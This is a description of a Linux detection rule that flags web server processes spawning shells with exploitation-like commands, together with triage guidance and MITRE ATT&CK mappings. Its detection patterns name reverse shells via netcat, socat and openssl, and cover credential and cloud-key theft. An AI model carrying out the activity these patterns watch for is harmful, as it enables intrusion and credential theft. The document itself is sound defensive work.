This rule detects suspicious command execution initiated by a web server on Linux endpoints, indicating potential vulnerability exploitation, web shell activity, or backdoor persistence. It fires when a Linux host process starts a shell to run commands that resemble exploitation activities (discovery, credential access, payload decoding, or reverse shell setup). The detection concentrates on web server processes (and their common parents such as nginx, apache2, httpd, php-fpm, java-based servers, etc.) launching shells (bash, sh, dash, tcsh, csh, zsh, etc.) with interpreter invocations like -c, -cl, or -lc. The rule’s command_line coverage captures patterns typical of abuse: working directories like /tmp, /var/tmp, /dev/shm, and /run; encoding/decoding and piping techniques; credential and key discovery; AWS/Azure/GCP credential exposure; AWS config files; discovery of system and network information; reverse shells via netcat/socat/openssl; file and cron manipulation; and various web-application frameworks (PHP, Python, Ruby, Java). It also enforces a guardrail to minimize false positives by excluding known legitimate admin tasks and expected maintenance workflows. The accompanying triage guidance emphasizes reconstructing the execution chain (process ancestry, environment, and receiving user/request context), correlating with web server access/error/application logs, inspecting web root and writable directories for dropped scripts or payloads, and isolating/remediating compromised hosts or vulnerable apps if unauthorized activity is confirmed. The rule is aligned with MITRE ATT&CK mappings for Web Shell (T1505.003), Exploit Public-Facing Application (T1190), and Command and Scripting Interpreter (T1059).